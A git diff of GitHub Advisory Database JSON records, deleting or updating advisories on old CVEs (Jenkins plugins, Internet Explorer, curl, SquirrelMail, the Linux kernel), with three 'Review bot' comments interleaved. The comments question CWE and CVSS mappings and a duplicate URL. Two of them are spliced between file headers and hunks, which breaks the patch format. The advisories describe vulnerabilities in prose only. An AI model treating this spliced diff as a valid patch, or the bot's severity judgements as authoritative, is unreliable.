- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2020-05-05T22:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-745w-v492-4fj5/GHSA-745w-v492-4fj5.json b/advisories/unreviewed/2022/05/GHSA-745w-v492-4fj5/GHSA-745w-v492-4fj5.json
deleted file mode 100644
index 7d4382adb9b3d..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-745w-v492-4fj5/GHSA-745w-v492-4fj5.json
+++ /dev/null
@@ -1,46 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-745w-v492-4fj5",
- "modified": "2023-10-25T18:31:23Z",
- "published": "2022-05-24T16:50:04Z",
- "aliases": [
- "CVE-2019-10342"
- ],
- "details": "A missing permission check in Jenkins Docker Plugin 1.1.6 and earlier in various 'fillCredentialsIdItems' methods allowed users with Overall/Read access to enumerate credentials ID of credentials stored in Jenkins.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10342"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-07-11/#SECURITY-1400"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/07/11/4"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/109156"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-862"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-07-11T14:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-74c2-965q-mqjw/GHSA-74c2-965q-mqjw.json b/advisories/unreviewed/2022/05/GHSA-74c2-965q-mqjw/GHSA-74c2-965q-mqjw.json
deleted file mode 100644
index 525708caee335..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-74c2-965q-mqjw/GHSA-74c2-965q-mqjw.json
+++ /dev/null
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-74c2-965q-mqjw",
- "modified": "2023-10-25T18:31:29Z",
- "published": "2022-05-24T16:58:50Z",
- "aliases": [
- "CVE-2019-10457"
- ],
- "details": "A missing permission check in Jenkins Oracle Cloud Infrastructure Compute Classic Plugin allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10457"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-10-16/#SECURITY-1462"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/10/16/6"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-862"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-10-16T14:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-7577-f8fp-5977/GHSA-7577-f8fp-5977.json b/advisories/unreviewed/2022/05/GHSA-7577-f8fp-5977/GHSA-7577-f8fp-5977.json
deleted file mode 100644
index e5ffba6bced37..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-7577-f8fp-5977/GHSA-7577-f8fp-5977.json
+++ /dev/null
@@ -1,38 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-7577-f8fp-5977",
- "modified": "2022-05-14T02:57:57Z",
- "published": "2022-05-14T02:57:57Z",
- "aliases": [
- "CVE-2018-1999029"
- ],
- "details": "A cross-site scripting vulnerability exists in Jenkins Shelve Project Plugin 1.5 and earlier in ShelveProjectAction/index.jelly, ShelvedProjectsAction/index.jelly that allows attackers with Job/Configure permission to define JavaScript that would be executed in another user's browser when that other user performs some UI actions.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1999029"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2018-07-30/#SECURITY-1001"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-79"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2018-08-01T13:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-774g-r3fm-4v85/GHSA-774g-r3fm-4v85.json b/advisories/unreviewed/2022/05/GHSA-774g-r3fm-4v85/GHSA-774g-r3fm-4v85.json
deleted file mode 100644
index 57d107e220560..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-774g-r3fm-4v85/GHSA-774g-r3fm-4v85.json
+++ /dev/null
@@ -1,38 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-774g-r3fm-4v85",
- "modified": "2022-05-17T00:29:02Z",
- "published": "2022-05-17T00:29:02Z",
- "aliases": [
- "CVE-2017-1000090"
- ],
- "details": "Role-based Authorization Strategy Plugin was not requiring requests to its API be sent via POST, thereby opening itself to Cross-Site Request Forgery attacks. This allowed attackers to add administrator role to any user, or to remove the authorization configuration, preventing legitimate access to Jenkins.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000090"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2017-07-10/"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-352"
- ],
- "severity": "HIGH",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2017-10-05T01:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-777c-wmxv-2wcq/GHSA-777c-wmxv-2wcq.json b/advisories/unreviewed/2022/05/GHSA-777c-wmxv-2wcq/GHSA-777c-wmxv-2wcq.json
index 0883f49ce4480..38b3f7287034b 100644
--- a/advisories/unreviewed/2022/05/GHSA-777c-wmxv-2wcq/GHSA-777c-wmxv-2wcq.json
+++ b/advisories/unreviewed/2022/05/GHSA-777c-wmxv-2wcq/GHSA-777c-wmxv-2wcq.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-777c-wmxv-2wcq",
- "modified": "2022-05-13T01:07:44Z",
+ "modified": "2024-02-02T18:30:22Z",
 "published": "2022-05-13T01:07:44Z",
 "aliases": [
 "CVE-2010-3328"
 ],
 "details": "Use-after-free vulnerability in the CAttrArray::PrivateFind function in mshtml.dll in Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code by setting an unspecified property of a stylesheet object, aka \"Uninitialized Memory Corruption Vulnerability.\"",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -45,7 +48,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-416"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-77fh-vc7f-w685/GHSA-77fh-vc7f-w685.json b/advisories/unreviewed/2022/05/GHSA-77fh-vc7f-w685/GHSA-77fh-vc7f-w685.json
index 143d6bcd8b202..23cfadeb76d9a 100644
--- a/advisories/unreviewed/2022/05/GHSA-77fh-vc7f-w685/GHSA-77fh-vc7f-w685.json
+++ b/advisories/unreviewed/2022/05/GHSA-77fh-vc7f-w685/GHSA-77fh-vc7f-w685.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-77fh-vc7f-w685",
- "modified": "2022-05-01T02:05:40Z",
+ "modified": "2024-02-08T21:30:31Z",
 "published": "2022-05-01T02:05:40Z",
 "aliases": [
 "CVE-2005-2182"
 ],
 "details": "Grandstream BudgeTone (BT) 100 Voice over IP (VoIP) phones do not properly check the Call-ID, branch, and tag values in a NOTIFY message to verify a subscription, which allows remote attackers to spoof messages such as the \"Messages waiting\" message.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
+ }
 ],
 "affected": [
@@ -37,7 +40,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-347"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
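Review bot: In the second GHSA-77fh-vc7f-w685 hunk (`@@ -37,7 +40,7 @@`) the CWE being added is `"CWE-347"`, Improper Verification of Cryptographic Signature, but the details text a few lines up describes the phone failing to check the Call-ID, branch and tag values of a SIP NOTIFY against an existing subscription — a missing dialog-identifier check with no signature or cryptography involved. CWE-345 (Insufficient Verification of Data Authenticity) or CWE-290 (Authentication Bypass by Spoofing) would describe a spoofed "Messages waiting" notification more accurately, e.g. `"CWE-345"`. If the id is mirrored verbatim from NVD it should stay as-is for consistency with upstream, but it deserves a curator flag so the mapping is not taken as an independent assessment.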
diff --git a/advisories/unreviewed/2022/05/GHSA-79mr-p6x2-hw9g/GHSA-79mr-p6x2-hw9g.json b/advisories/unreviewed/2022/05/GHSA-79mr-p6x2-hw9g/GHSA-79mr-p6x2-hw9g.json
index ad175efb072ba..db9e55a9874f4 100644
--- a/advisories/unreviewed/2022/05/GHSA-79mr-p6x2-hw9g/GHSA-79mr-p6x2-hw9g.json
+++ b/advisories/unreviewed/2022/05/GHSA-79mr-p6x2-hw9g/GHSA-79mr-p6x2-hw9g.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-79mr-p6x2-hw9g",
- "modified": "2022-05-17T05:34:15Z",
+ "modified": "2024-02-08T21:30:32Z",
 "published": "2022-05-17T05:34:15Z",
 "aliases": [
 "CVE-2010-1637"
 ],
 "details": "The Mail Fetch plugin in SquirrelMail 1.4.20 and earlier allows remote authenticated users to bypass firewall restrictions and use SquirrelMail as a proxy to scan internal networks via a modified POP3 port number.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
 ],
 "affected": [
@@ -101,7 +104,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-918"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-7cgf-hgcw-hxxj/GHSA-7cgf-hgcw-hxxj.json b/advisories/unreviewed/2022/05/GHSA-7cgf-hgcw-hxxj/GHSA-7cgf-hgcw-hxxj.json
index d95eae8205f87..bbfe764bdad61 100644
--- a/advisories/unreviewed/2022/05/GHSA-7cgf-hgcw-hxxj/GHSA-7cgf-hgcw-hxxj.json
+++ b/advisories/unreviewed/2022/05/GHSA-7cgf-hgcw-hxxj/GHSA-7cgf-hgcw-hxxj.json
@@ -41,7 +41,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-20"
+ "CWE-20",
+ "CWE-78"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-7f6w-fhmr-j8hq/GHSA-7f6w-fhmr-j8hq.json b/advisories/unreviewed/2022/05/GHSA-7f6w-fhmr-j8hq/GHSA-7f6w-fhmr-j8hq.json
deleted file mode 100644
index a03a3c6c2ae4d..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-7f6w-fhmr-j8hq/GHSA-7f6w-fhmr-j8hq.json
+++ /dev/null
@@ -1,62 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-7f6w-fhmr-j8hq",
- "modified": "2022-05-17T00:50:19Z",
- "published": "2022-05-17T00:50:19Z",
- "aliases": [
- "CVE-2014-9635"
- ],
- "details": "Jenkins before 1.586 does not set the HttpOnly flag in a Set-Cookie header for session cookies when run on Tomcat 7.0.41 or later, which makes it easier for remote attackers to obtain potentially sensitive information via script access to cookies.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-9635"
- },
- {
- "type": "WEB",
- "url": "https://github.com/jenkinsci/jenkins/commit/582128b9ac179a788d43c1478be8a5224dc19710"
- },
- {
- "type": "WEB",
- "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=769682"
- },
- {
- "type": "WEB",
- "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1185151"
- },
- {
- "type": "WEB",
- "url": "https://issues.jenkins-ci.org/browse/JENKINS-25019"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/changelog-old/"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2015/01/22/3"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/72054"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2017-09-12T14:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-7gfc-2v6g-6w9f/GHSA-7gfc-2v6g-6w9f.json b/advisories/unreviewed/2022/05/GHSA-7gfc-2v6g-6w9f/GHSA-7gfc-2v6g-6w9f.json
deleted file mode 100644
index 9de5b8378fcf5..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-7gfc-2v6g-6w9f/GHSA-7gfc-2v6g-6w9f.json
+++ /dev/null
@@ -1,67 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-7gfc-2v6g-6w9f",
- "modified": "2022-05-17T05:45:29Z",
- "published": "2022-05-17T05:45:29Z",
- "aliases": [
- "CVE-2010-2477"
- ],
- "details": "Multiple cross-site scripting (XSS) vulnerabilities in the paste.httpexceptions implementation in Paste before 1.7.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving a 404 status code, related to (1) paste.urlparser.StaticURLParser, (2) paste.urlparser.PkgResourcesParser, (3) paste.urlmap.URLMap, and (4) HTTPNotFound.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2477"
- },
- {
- "type": "WEB",
- "url": "http://bitbucket.org/ianb/paste/changeset/fcae59df8b56"
- },
- {
- "type": "WEB",
- "url": "http://groups.google.com/group/paste-users/browse_thread/thread/3b3fff3dadd0b1e5?pli=1"
- },
- {
- "type": "WEB",
- "url": "http://groups.google.com/group/pylons-discuss/msg/8c256dc076a408d8?dmode=source&output=gplain"
- },
- {
- "type": "WEB",
- "url": "http://marc.info/?l=oss-security&m=127785414818815&w=2"
- },
- {
- "type": "WEB",
- "url": "http://marc.info/?l=oss-security&m=127792576822169&w=2"
- },
- {
- "type": "WEB",
- "url": "http://pylonshq.com/articles/archives/2010/6/paste_174_released_addresses_xss_security_hole"
- },
- {
- "type": "WEB",
- "url": "http://secunia.com/advisories/42500"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/41160"
- },
- {
- "type": "WEB",
- "url": "http://www.ubuntu.com/usn/USN-1026-1"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-79"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2010-11-06T00:00:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-7hqx-w6mq-g592/GHSA-7hqx-w6mq-g592.json b/advisories/unreviewed/2022/05/GHSA-7hqx-w6mq-g592/GHSA-7hqx-w6mq-g592.json
index ed6ac0e241029..7df606b4b480d 100644
--- a/advisories/unreviewed/2022/05/GHSA-7hqx-w6mq-g592/GHSA-7hqx-w6mq-g592.json
+++ b/advisories/unreviewed/2022/05/GHSA-7hqx-w6mq-g592/GHSA-7hqx-w6mq-g592.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-7hqx-w6mq-g592",
- "modified": "2022-05-24T16:53:50Z",
+ "modified": "2024-02-03T03:30:26Z",
 "published": "2022-05-24T16:53:50Z",
 "aliases": [
 "CVE-2019-15118"
 ],
 "details": "check_input_term in sound/usb/mixer.c in the Linux kernel through 5.2.9 mishandles recursion, leading to kernel stack exhaustion.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
+ }
 ],
 "affected": [
@@ -30,6 +33,10 @@
 "type": "WEB",
 "url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00000.html"
 },
+ {
+ "type": "WEB",
+ "url": "https://lore.kernel.org/lkml/20190815043554.16623-1-benquike%40gmail.com/"
+ },
 {
 "type": "WEB",
 "url": "https://lore.kernel.org/lkml/20190815043554.16623-1-benquike@gmail.com/"
@@ -85,7 +92,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-674"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-7m2x-qhrq-rp8h/GHSA-7m2x-qhrq-rp8h.json b/advisories/unreviewed/2022/05/GHSA-7m2x-qhrq-rp8h/GHSA-7m2x-qhrq-rp8h.json
deleted file mode 100644
index 07eaf25d7878b..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-7m2x-qhrq-rp8h/GHSA-7m2x-qhrq-rp8h.json
+++ /dev/null
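Review bot: In the `@@ -30,6 +33,10 @@` hunk of GHSA-7hqx-w6mq-g592 the added reference `https://lore.kernel.org/lkml/20190815043554.16623-1-benquike%40gmail.com/` is the same URL as the existing entry directly below it, differing only in `%40` versus `@`, so the reference list now carries a duplicate because the import compares URLs byte-for-byte instead of after percent-decoding. I would drop the four added lines and keep the existing `@` entry, or normalize `%40` to `@` in the sync step so the two compare equal. The `@@ -85,7 +92,7 @@` hunk adding `"CWE-674"` matches the recursion/stack-exhaustion wording in `details` and looks fine; the enclosing `references` array starts and ends outside the hunk.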
@@ -1,46 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-7m2x-qhrq-rp8h",
- "modified": "2023-02-28T15:30:22Z",
- "published": "2022-05-24T17:18:38Z",
- "aliases": [
- "CVE-2020-13430"
- ],
- "details": "Grafana before 7.0.0 allows tag value XSS via the OpenTSDB datasource.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-13430"
- },
- {
- "type": "WEB",
- "url": "https://github.com/grafana/grafana/pull/24539"
- },
- {
- "type": "WEB",
- "url": "https://github.com/grafana/grafana/releases/tag/v7.0.0"
- },
- {
- "type": "WEB",
- "url": "https://security.netapp.com/advisory/ntap-20200528-0003/"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-79"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2020-05-24T18:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-7mv6-r5f6-w598/GHSA-7mv6-r5f6-w598.json b/advisories/unreviewed/2022/05/GHSA-7mv6-r5f6-w598/GHSA-7mv6-r5f6-w598.json
index 19447fcafa212..9ecec47ab09c8 100644
--- a/advisories/unreviewed/2022/05/GHSA-7mv6-r5f6-w598/GHSA-7mv6-r5f6-w598.json
+++ b/advisories/unreviewed/2022/05/GHSA-7mv6-r5f6-w598/GHSA-7mv6-r5f6-w598.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-7mv6-r5f6-w598",
- "modified": "2022-05-01T01:49:47Z",
+ "modified": "2024-02-02T03:30:30Z",
 "published": "2022-05-01T01:49:47Z",
 "aliases": [
 "CVE-2005-0490"
 ],
 "details": "Multiple stack-based buffer overflows in libcURL and cURL 7.12.1, and possibly other versions, allow remote malicious web servers to execute arbitrary code via base64 encoded replies that exceed the intended buffer lengths when decoded, which is not properly handled by (1) the Curl_input_ntlm function in http_ntlm.c during NTLM authentication or (2) the Curl_krb_kauth and krb4_auth functions in krb4.c during Kerberos authentication.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -69,7 +72,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-131"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-7mvg-cx9c-r6jm/GHSA-7mvg-cx9c-r6jm.json b/advisories/unreviewed/2022/05/GHSA-7mvg-cx9c-r6jm/GHSA-7mvg-cx9c-r6jm.json
deleted file mode 100644
index bed7877c08a8e..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-7mvg-cx9c-r6jm/GHSA-7mvg-cx9c-r6jm.json
+++ /dev/null
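Review bot: The CVSS vector added for GHSA-7mv6-r5f6-w598, `"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"`, carries PR:L, yet the `details` text on the same hunk describes a malicious web server attacking the curl/libcurl client through oversized base64 replies; in that model the attacker holds no privileges on the vulnerable component, and client-side bugs of this shape are conventionally scored PR:N with UI:R because the victim has to initiate the connection. If the vector is a verbatim copy of NVD's it should stay for consistency with upstream, but it is worth a curator flag rather than being treated as an independent assessment. The `"CWE-131"` mapping in the `@@ -69,7 +72,7 @@` hunk is plausible given the "exceed the intended buffer lengths when decoded" wording.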
@@ -1,46 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-7mvg-cx9c-r6jm",
- "modified": "2023-10-25T18:31:20Z",
- "published": "2022-05-24T16:44:55Z",
- "aliases": [
- "CVE-2019-10312"
- ],
- "details": "A missing permission check in Jenkins Ansible Tower Plugin 0.9.1 and earlier in the TowerInstallation.TowerInstallationDescriptor#doFillTowerCredentialsIdItems method allowed attackers with Overall/Read permission to enumerate credentials ID of credentials stored in Jenkins.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10312"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-04-30/#SECURITY-1355"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/04/30/5"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/108159"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-862"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-04-30T13:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-7p4p-v6hr-gp3m/GHSA-7p4p-v6hr-gp3m.json b/advisories/unreviewed/2022/05/GHSA-7p4p-v6hr-gp3m/GHSA-7p4p-v6hr-gp3m.json
deleted file mode 100644
index d637b0509788d..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-7p4p-v6hr-gp3m/GHSA-7p4p-v6hr-gp3m.json
+++ /dev/null
@@ -1,38 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-7p4p-v6hr-gp3m",
- "modified": "2022-05-14T03:13:12Z",
- "published": "2022-05-14T03:13:12Z",
- "aliases": [
- "CVE-2018-1000196"
- ],
- "details": "A exposure of sensitive information vulnerability exists in Jenkins Gitlab Hook Plugin 1.4.2 and older in gitlab_notifier.rb, views/gitlab_notifier/global.erb that allows attackers with local Jenkins master file system access or control of a Jenkins administrator's web browser (e.g. malicious extension) to retrieve the configured Gitlab token.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000196"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2018-05-09/#SECURITY-263"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-200"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2018-06-05T21:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-7qf3-8pfp-6qg9/GHSA-7qf3-8pfp-6qg9.json b/advisories/unreviewed/2022/05/GHSA-7qf3-8pfp-6qg9/GHSA-7qf3-8pfp-6qg9.json
index dacfdd41f27d0..e7e98c8f3e282 100644
--- a/advisories/unreviewed/2022/05/GHSA-7qf3-8pfp-6qg9/GHSA-7qf3-8pfp-6qg9.json
+++ b/advisories/unreviewed/2022/05/GHSA-7qf3-8pfp-6qg9/GHSA-7qf3-8pfp-6qg9.json
@@ -173,7 +173,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-362"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-7w42-h9j5-82q5/GHSA-7w42-h9j5-82q5.json b/advisories/unreviewed/2022/05/GHSA-7w42-h9j5-82q5/GHSA-7w42-h9j5-82q5.json
index df8f583a49cec..ca48e9831d143 100644
--- a/advisories/unreviewed/2022/05/GHSA-7w42-h9j5-82q5/GHSA-7w42-h9j5-82q5.json
+++ b/advisories/unreviewed/2022/05/GHSA-7w42-h9j5-82q5/GHSA-7w42-h9j5-82q5.json
@@ -65,6 +65,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
+ "CWE-78",
 "CWE-94"
 ],
 "severity": "MODERATE",
diff --git a/advisories/unreviewed/2022/05/GHSA-7w6p-rwhg-7h3g/GHSA-7w6p-rwhg-7h3g.json b/advisories/unreviewed/2022/05/GHSA-7w6p-rwhg-7h3g/GHSA-7w6p-rwhg-7h3g.json
deleted file mode 100644
index 3e87ce34ef724..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-7w6p-rwhg-7h3g/GHSA-7w6p-rwhg-7h3g.json
+++ /dev/null
@@ -1,39 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-7w6p-rwhg-7h3g",
- "modified": "2022-05-24T17:07:02Z",
- "published": "2022-05-24T17:07:02Z",
- "aliases": [
- "CVE-2020-6638"
- ],
- "details": "Grin through 2.1.1 has Insufficient Validation.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-6638"
- },
- {
- "type": "WEB",
- "url": "https://github.com/mimblewimble/grin-security/blob/master/CVEs/CVE-2020-6638.md"
- },
- {
- "type": "WEB",
- "url": "https://github.com/mimblewimble/grin/compare/v2.1.1...v3.0.0"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2020-01-21T20:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-867w-fmxg-m2g8/GHSA-867w-fmxg-m2g8.json b/advisories/unreviewed/2022/05/GHSA-867w-fmxg-m2g8/GHSA-867w-fmxg-m2g8.json
index 81ec98ac61b87..b9f8eb7acea7f 100644
--- a/advisories/unreviewed/2022/05/GHSA-867w-fmxg-m2g8/GHSA-867w-fmxg-m2g8.json
+++ b/advisories/unreviewed/2022/05/GHSA-867w-fmxg-m2g8/GHSA-867w-fmxg-m2g8.json
@@ -33,10 +33,18 @@
 "type": "WEB",
 "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00003.html"
 },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZXCI33HXH6YSOGC2LPE2REQLMIDH6US4/"
+ },
 {
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZXCI33HXH6YSOGC2LPE2REQLMIDH6US4/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-32"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5490"
diff --git a/advisories/unreviewed/2022/05/GHSA-8864-pwhg-3mp2/GHSA-8864-pwhg-3mp2.json b/advisories/unreviewed/2022/05/GHSA-8864-pwhg-3mp2/GHSA-8864-pwhg-3mp2.json
deleted file mode 100644
index 5a7640b426051..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-8864-pwhg-3mp2/GHSA-8864-pwhg-3mp2.json
+++ /dev/null
